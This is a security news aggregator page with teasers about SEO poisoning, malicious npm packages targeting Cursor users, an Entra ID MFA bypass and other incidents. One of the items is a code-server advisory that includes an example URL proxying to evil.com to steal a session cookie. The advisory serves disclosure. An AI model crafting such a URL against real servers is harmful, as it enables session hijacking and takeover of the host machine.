Security
Headlines
HeadlinesLatestCVEs

Tag

#mac

New SEO Poisoning Campaign Targeting IT Admins With Malware

Varonis reveals attackers are using SEO poisoning to trick IT admins into downloading malware, alongside a critical root…

HackRead
Open in Source
#vulnerability#web#mac#microsoft#linux#git#intel#backdoor
ICE’s Deportation Airline Hack Reveals Man ‘Disappeared’ to El Salvador

Plus: A DOGE operative’s laptop reportedly gets infected with malware, Grok AI is used to “undress” women on X, a school software company’s ransomware nightmare returns, and more.

GHSA-p483-wpfp-42cj: code-server's session cookie can be extracted by having user visit specially crafted proxy URL

### Summary A maliciously crafted URL using the `proxy` subpath can result in the attacker gaining access to the session token. ### Details Failure to properly validate the port for a `proxy` request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user's session token. ### Impact Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to `/proxy`. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. ### Patches Patched versions are from...

Google Chrome will use AI to block tech support scam websites

Google announced it will equip Chrome with an AI driven method to detect and block Tech Support Scam websites

Legacy Login in Microsoft Entra ID Exploited to Breach Cloud Accounts

A flaw in Microsoft Entra ID’s legacy login allowed attackers to bypass MFA, targeting admin accounts across finance,…

Malicious npm Packages Infect 3,200+ Cursor Users With Backdoor, Steal Credentials

Cybersecurity researchers have flagged three malicious npm packages that are designed to target the Apple macOS version of Cursor, a popular artificial intelligence (AI)-powered source code editor. "Disguised as developer tools offering 'the cheapest Cursor API,' these packages steal user credentials, fetch an encrypted payload from threat actor-controlled infrastructure, overwrite Cursor's

From Complexity to Clarity: The Blueprint for Scalable Workflow Automation

Cloud-native applications offer scalable, automated workflows, intelligent data processing, and seamless deployments. However, many organizations still struggle to…

Tired of Google sponsored ads? So are we! That’s why we’re introducing the option to block them on iOS    

We're rolling out a brand new feature in Malwarebytes for iOS: the ability to block Google sponsored ads directly on Safari.

Fake Crypto Exchange Ads on Facebook Spread Malware

Bitdefender exposes Facebook ad scams using fake crypto sites and celebrity lures to spread malware via malicious desktop…

Passwords in the age of AI: We need to find alternatives

The age of AI guessing our passwords is upon us, and we need to change the ways we authenticate and use passwords where we have no alternatives.